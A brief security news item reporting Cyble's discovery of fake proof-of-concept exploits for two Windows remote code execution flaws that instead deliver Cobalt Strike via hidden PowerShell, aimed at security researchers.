Cybersecurity professionals are being targeted with fake proof-of-concept exploits developed for malware delivery, according to SecurityWeek.
Fraudulent PoC exploits for Windows remote code execution flaws, tracked as CVE-2022-24500 and CVE-2022-26809 and patched last month, have been discovered by Cyble researchers to contain malicious software. Both fake PoC, which were .NET binaries with the ConfuserEx open source application protector, are suspected to have been developed by the same threat actor.
Execution of the binaries will trigger a concealed PowerShell command that would then distribute Cobalt Strike, which is then used for additional malware downloads and lateral movement.
"Usually, people working in information security or TAs use exploits to check for vulnerabilities. Hence, this malware might only target people from this community. Therefore, it becomes essential for the Infosec Community members to check the credibility of sources before downloading any proof of concept," said Cyble, which noted that it remains uncertain whether the exploits have been executed.